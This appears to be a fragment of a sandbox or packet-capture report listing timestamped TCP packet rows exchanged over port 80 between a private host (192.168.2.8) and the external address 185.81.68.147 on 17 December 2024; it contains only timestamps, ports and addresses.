                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.016177893 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.016931057 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.017057896 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.017144918 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.018018007 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.018095016 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.018186092 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.018842936 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.019037962 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.019172907 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.019802094 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.019901991 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.019987106 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.020739079 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.020818949 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.021004915 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.021686077 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.021759987 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.021872044 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.022639036 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.022742033 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.022831917 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.023623943 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.023685932 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.023776054 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.024543047 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.024653912 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.024764061 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.025528908 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.025600910 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.025717020 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.026429892 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.026628017 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.026710987 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.027443886 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.027535915 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.027667999 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.028373003 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.028484106 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.028578043 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.029335022 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.029479980 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.029571056 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.030267954 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.030395985 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.030477047 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.031217098 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.031339884 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.031430006 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.032160044 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.032274008 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.032461882 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.033087969 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.082355022 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.176173925 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.176225901 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.176316977 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.176529884 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.176678896 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.176747084 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.177330017 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.218431950 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.219198942 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.219419956 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.219484091 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.220441103 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.220541954 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.220664978 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.221199036 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.221270084 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.221350908 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.222067118 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.222285032 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.222378969 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.223057032 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.223169088 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.223256111 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.224034071 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.224117994 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.224214077 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.224896908 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.225034952 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.225162029 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.225800991 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.269830942 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.368005037 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.368026972 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.368194103 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.368596077 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.368705988 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.368797064 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.369359970 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.369457006 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.369779110 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.370297909 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.370385885 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.370548010 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.371253014 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.371273041 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.371568918 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.372186899 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.372334003 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.372453928 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.373121977 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.373238087 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.373394966 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.374135017 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.374181986 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.374325037 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.375026941 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.375092983 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.375190973 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.375999928 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.376149893 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.376246929 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.376940012 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.377058029 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.377146006 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.377919912 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.378011942 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.378384113 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.378837109 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.378930092 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.379367113 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.379823923 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.379940033 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.380055904 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.380772114 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.380856037 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.380965948 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.381695986 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.381820917 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.381989002 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.382699966 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.382791042 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.382878065 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.383593082 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.383783102 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.383882046 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.384562016 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.384670019 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.384808064 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.385550022 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.385689974 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.385826111 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.386483908 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.386598110 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.386688948 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.387438059 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.387535095 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.387876987 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.388355017 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.388432980 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.388631105 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.389328957 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.389420986 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.389509916 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.390296936 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.390403986 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.573002100 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.573107958 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.573121071 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.573947906 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.574038982 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.574120998 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.574925900 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.574980974 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.575062037 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.575905085 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.576031923 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.576076031 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.576754093 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.576843023 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.576865911 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.577866077 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.577917099 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.577934027 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.578655958 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.578792095 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.578831911 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.579608917 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.579727888 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.579729080 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.580559969 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.580718040 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.580750942 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.581553936 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.581653118 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.581675053 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.582454920 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.582523108 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.582561016 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.583448887 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.583564043 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.583638906 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.584428072 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.584500074 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.584592104 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.585323095 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.585406065 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.585438013 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.586268902 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.586385012 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.586385965 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.587256908 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.587331057 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.587419987 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.588215113 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.588260889 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.588279963 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.589119911 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.589191914 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.589258909 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.590138912 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.590203047 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.590251923 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.591037989 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.591099977 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.591152906 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.591979027 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.592083931 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.592096090 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.592963934 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.593065023 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.593105078 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.593889952 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.593960047 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.594053030 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.594852924 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.594924927 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.595096111 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.595817089 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.595905066 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.595910072 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.596756935 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.596859932 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.596972942 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.597668886 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.597742081 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.597793102 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.598655939 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.598788023 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.598795891 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.599620104 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.599739075 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.599749088 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.600622892 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.600713015 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.600712061 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.601497889 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.601552963 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.601572990 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.602442980 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.602562904 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.602646112 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.603609085 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.603648901 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.785840034 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.786618948 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.786731958 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.786812067 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.787587881 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.787657976 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.787729979 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.788507938 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.788649082 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.788829088 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.789485931 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.789658070 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.789729118 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.790421009 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.790525913 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.790599108 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.791429996 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.791544914 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.791615009 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.792356968 CET8049709185.81.68.147192.168.2.8
